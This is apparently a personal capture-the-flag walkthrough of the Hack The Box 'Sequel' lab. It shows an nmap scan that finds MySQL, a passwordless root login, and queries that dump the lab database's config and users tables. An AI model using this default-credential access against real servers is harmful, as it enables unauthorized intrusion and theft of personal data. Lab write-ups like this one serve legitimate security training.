Title here
Summary here
HTB | Sequel - Starting Point
Created: Feb 28, 2026
Last edited: Mar 2, 2026
Last edited: Mar 2, 2026
https://app.hackthebox.com/machines/Sequel/
Sequel | Walkthrough
| Phase |
|---|
| Reconnaissance |
| Foothold |
Reconnaissance
Using nmap to enumerate all open ports in the target
nmap -sV 10.129.23.232nopedawn@npdn ~/L/H/S/Sequel> nmap -sV 10.129.23.232
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-28 14:24 WIB
Nmap scan report for 10.129.23.232
Host is up (0.87s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1068.55 secondsThere is tcp port open for mysql service in port 3306, let’s go ahead to foothold real quick.
Foothold
We know that mysql credential by default is root with no password needed (see this: Mysql Connect)
I quickly remote connect it to that host and use root as a default weak credential, using this following command
mysql -u root -h 10.129.23.232 -P 3306$ mysql -u root -h 10.129.23.232 -P 3306
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 67
Server version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2026, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>And it’s successfully logged in as a root, such a bad configuration and that’s not recommended for devs to start configuring db like that.
With version version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10.
So now let’s look all the db’s
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (1.03 sec)There are three standard default db’s and one db created by user, htb. Use that htb db.
mysql> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.93 sec)In htb db, there are two tables config & users. Let’s look at one of them.
mysql> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | REDACTED |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.48 sec)In config table, some several information about config table leaked, and there was a flag.
So now, let’s look at the other table, users.
mysql> select * from user;
ERROR 1146 (42S02): Table 'htb.user' doesn't exist
mysql> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (1.92 sec)Some several credentials from users table leaked, this can lead to data breaches, confidential information, full account takeovers, and identity theft.
Source:
https://hackviser.com/tactics/pentesting/services/mysql#connect